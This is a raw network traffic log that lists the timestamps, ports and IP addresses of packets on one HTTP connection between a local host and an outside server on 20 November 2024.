Nov 20, 2024 16:58:30.357378006 CET  80     49178  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:30.357568026 CET  80     49178  192.3.220.29  192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.357618093 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.358939886 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.358952999 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.359003067 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.360668898 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.360686064 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.360733986 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.361979961 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.362147093 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.362198114 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.363539934 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.363637924 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.363684893 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.365122080 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.365402937 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.365449905 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.366816998 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.366830111 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.366880894 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.368437052 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.368449926 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.368494034 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.370059013 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.370073080 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.370124102 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.371440887 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.371557951 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.371609926 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.373012066 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.373128891 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.373187065 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.374820948 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.374991894 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.375053883 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.376346111 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.376363039 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.376405954 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.377798080 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.377897024 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.377952099 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.451415062 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.451528072 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.451579094 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.452116013 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.452178001 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.452217102 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.453083038 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.453268051 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.453301907 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.454303980 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.454405069 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.454447985 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.455709934 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.455811024 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.455856085 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.461373091 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461410999 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461426973 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461456060 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.461504936 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461520910 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461535931 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461539030 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.461551905 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461568117 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.461571932 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461601973 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.461816072 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461957932 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.461991072 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.471601963 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471704960 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471745968 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.471796989 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471813917 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471853971 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.471875906 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471892118 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471916914 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471925974 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.471945047 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471961975 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.471980095 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.472018957 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.472033978 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.472049952 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.472055912 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.472067118 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.472081900 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.472085953 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.472111940 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.472111940 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.472130060 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.472161055 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.473001003 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.473313093 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.473340988 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.474383116 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.474524975 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.474565029 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.475501060 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.475565910 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.475605011 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.476605892 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.476711988 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.476749897 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.479089975 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.479125023 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.479141951 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.479157925 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.479186058 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.480654955 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.480710030 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.480726004 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.481801987 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.481823921 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.481844902 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.482671022 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.482712984 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.482759953 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.483815908 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.483859062 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.483973980 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.484936953 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.484978914 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.485050917 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.485985994 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.486032963 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.486088991 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.487868071 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.487888098 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.487999916 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.488996029 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.489038944 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.489217043 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.489237070 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.489269972 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.489332914 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.490317106 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.490355968 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.490385056 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.491367102 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.491405964 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.491442919 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.492449045 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.492489100 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.492497921 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.493571997 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.493612051 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.493820906 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.494555950 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.494610071 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.494663954 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.495873928 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.495913029 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.495935917 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.496741056 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.496777058 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.496860027 CET8049178192.3.220.29192.168.2.22
Nov 20, 2024 16:58:30.497674942 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.497723103 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.497848034 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.498750925 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.498794079 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.498823881 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.499727964 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.499758959 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.499782085 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.500713110 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.500760078 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.500797033 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.501760960 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.501781940 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.501804113 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.502809048 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.502852917 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.503000975 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.503797054 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.503839016 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.503879070 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.504843950 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.504889011 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.504925966 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.505876064 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.505943060 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.505963087 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.506911039 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.506978035 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.507041931 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.508279085 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.508347034 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.508388042 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.509299994 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.509366035 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.509367943 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.511475086 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.511512041 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.511528969 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.511548042 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.511593103 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.655730009 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.655814886 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.655865908 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.655878067 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.655987978 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.656044006 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.656979084 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.657366991 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.657409906 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.658253908 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.658401966 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.658456087 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.659236908 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.659295082 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.659427881 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.660170078 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.660335064 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.660381079 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.661201954 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.661237955 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.661277056 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.662446022 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.662482023 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.662527084 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.663371086 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.663629055 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.663676977 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.664314032 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.664603949 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.664655924 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.665482044 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.665493965 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.665524960 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.666471004 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.666665077 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.666707993 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.667370081 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.667574883 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.667614937 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.668442965 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.668456078 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.668490887 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.669451952 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.669605970 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.669650078 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.670475960 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.670488119 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.670517921 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.671506882 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.671520948 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.671561956 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.672688961 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.672826052 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.672875881 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.673538923 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673702955 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673759937 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.673818111 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673830986 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673865080 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.673912048 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673923016 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673937082 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673949957 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.673958063 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.673981905 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.674295902 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.674484968 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.674525023 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.675297022 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.675419092 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.675481081 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.676413059 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.676489115 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.676559925 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.677369118 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.677426100 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.677498102 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.678412914 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.678486109 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.678558111 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.679371119 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.679601908 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.679676056 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.680428028 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.680521965 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.680591106 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.681396961 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.681484938 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.681555033 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.682403088 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.682527065 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.682595968 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.688515902 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.688642979 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.688674927 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.688707113 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.688719034 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.688745022 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.688781977 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.688797951 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.688858986 CET | 49178 | 80 | 192.168.2.22 | 192.3.220.29
Nov 20, 2024 16:58:30.689918041 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
Nov 20, 2024 16:58:30.689950943 CET | 80 | 49178 | 192.3.220.29 | 192.168.2.22
